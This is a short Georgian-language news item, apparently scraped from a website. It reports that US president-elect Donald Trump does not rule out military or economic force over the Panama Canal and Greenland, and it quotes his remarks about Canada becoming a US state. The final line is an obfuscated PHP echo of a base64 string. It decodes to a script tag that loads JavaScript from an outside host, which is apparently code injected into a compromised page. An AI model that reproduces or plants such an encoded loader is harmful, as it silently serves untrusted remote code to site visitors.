celsiusi
ავერსი jaluzi

აშშ-ის არჩეული პრეზიდენტი, დონალდ ტრამპი არ გამორიცხავს სამხედრო ძალის გამოყენებას პანამის არხსა და გრენლანდიაზე კონტროლის მოსაპოვებლად, - ინფორმაციასCNN-ი ავრცელებს.

მედიასთან საუბარში კითხვაზე, გამორიცხავს თუ არა ის სამხედრო ან ეკონომიკური ძალის გამოყენებას ამ ტერიტორიებზე კონტროლის მოსაპოვებლად, არჩეულმა პრეზიდენტმა უპასუხა: „არა“.

„არა. დარწმუნებით ვერ გეტყვით, ამ ორიდან რომელს, მაგრამ ამის თქმა შემიძლია. ჩვენ გვჭირდება ისინი ეკონომიკური უსაფრთხოებისთვის“, - განაცხადა ტრამპმა.

ამასთან, კითხვაზე, გამოიყენებს თუ არა ის სამხედრო ძალას კანადასთან დაკავშირებით, აშშ-ის არჩეულმა პრეზიდენტმა უპასუხა, რომ გამოიყენებს არა სამხედრო, არამედ ეკონომიკურ ძალას.

ცნობისთვის, დონალდ ტრამპმა მანამდე სოციალურ ქსელში დაწერა, რომ კანადაში ბევრს სურს აშშ-ის 51-ე შტატად ყოფნა. „კანადა რომ აშშ-ს შეუერთდეს, არ იქნებოდა ტარიფები, გადასახადები მნიშვნელოვნად შემცირდებოდა და ისინი სრულიად დაცულები იქნებოდნენ რუსული და ჩინური გემების საფრთხისგან, რომლებიც მუდმივად ირგვლივ არიან. ერთად რა დიდი ერი იქნებოდა!!!“ - განაცხადა ტრამპმა.

51
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");